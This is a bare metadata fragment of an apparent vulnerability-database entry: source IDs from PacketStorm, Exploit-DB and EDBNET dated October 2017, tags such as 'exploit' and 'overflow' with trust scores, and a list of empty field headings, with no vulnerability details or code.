db:	PACKETSTORM	id:	144471	date:	2017-10-02T08:32:22
db:	PACKETSTORM	id:	144480	date:	2017-10-02T16:22:22
db:	PACKETSTORM	id:	144479	date:	2017-10-02T14:44:44
db:	EXPLOIT-DB	id:	42946	date:	2017-10-02T00:00:00
db:	EDBNET	id:	94400	date:	2017-10-02T00:00:00
db:	EDBNET	id:	94654	date:	2017-10-13T00:00:00
db:	EDBNET	id:	94657	date:	2017-10-13T00:00:00
db:	EDBNET	id:	94656	date:	2017-10-13T00:00:00
db:	EDBNET	id:	94655	date:	2017-10-13T00:00:00
db:	EDBNET	id:	94653	date:	2017-10-13T00:00:00

tag:	exploit	Trust: 3.0
tag:	overflow	Trust: 1.5
tag:	denial of service	Trust: 0.5
tag:	info disclosure	Trust: 0.5

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE